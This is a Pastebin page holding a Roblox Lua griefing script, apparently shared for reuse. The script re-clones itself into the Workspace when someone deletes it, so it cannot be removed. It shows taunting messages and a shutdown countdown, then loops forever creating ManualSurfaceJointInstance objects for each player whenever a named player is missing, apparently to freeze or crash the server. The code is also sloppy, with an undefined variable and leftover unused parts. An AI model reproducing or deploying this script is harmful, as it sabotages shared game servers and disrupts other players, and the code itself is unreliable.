Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local Settings={["Un_Removable"]= "On"}
- local function mFloor(x) return x - x % 1 end
- local Un_Removable = tostring(Settings["Un_Removable"]):lower() == "on"
- if Un_Removable then
- Game.Workspace.DescendantRemoving:connect(function(Child)
- if not Remove_At_Will and Child == script then
- script:Clone().Parent = Game.Workspace
- end
- end)
- end --remove the unremoveable if you want...
- c = Instance.new("Hint")
- c.Text = "Lol,Don't remove hyperionGM,or denny1971 or the server becomes DERPY!" --change your name to mine
- c.Parent = game.Workspace
- text = {"Noob,you kicked me?THE SERVER WILL NOW BECOME NUKED in"} --also a message thing
- wait(1)
- text = {"Server Freeze Shutdown in 5"}
- wait(1)
- text = {"Server Freeze Shutdown in 4"}
- wait(1)
- text = {"Server Freeze Shutdown in 3"}
- wait(1)
- text = {"Server Freeze Shutdown in 2"}
- wait(1)
- text = {"Server Freeze Shutdown in 1"}
- wait(1)
- text = {"Server Freeze Shutdown in 0"}
- wait(1)
- text = {"The Server will now shutdown Good day sir!"}
- while wait(2) do
- if not game.Players:FindFirstChild("memberhero","memberhero") then
- local m = Instance.new("Message") m.Parent = Workspace
- for i,v in pairs(text) do
- m.Text = v
- wait(1)
- end
- for i,v in pairs(game.Players:GetChildren()) do
- Instance.new("ManualSurfaceJointInstance", workspace)
- end
- end
- end
- serverkill = true
- --lol!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement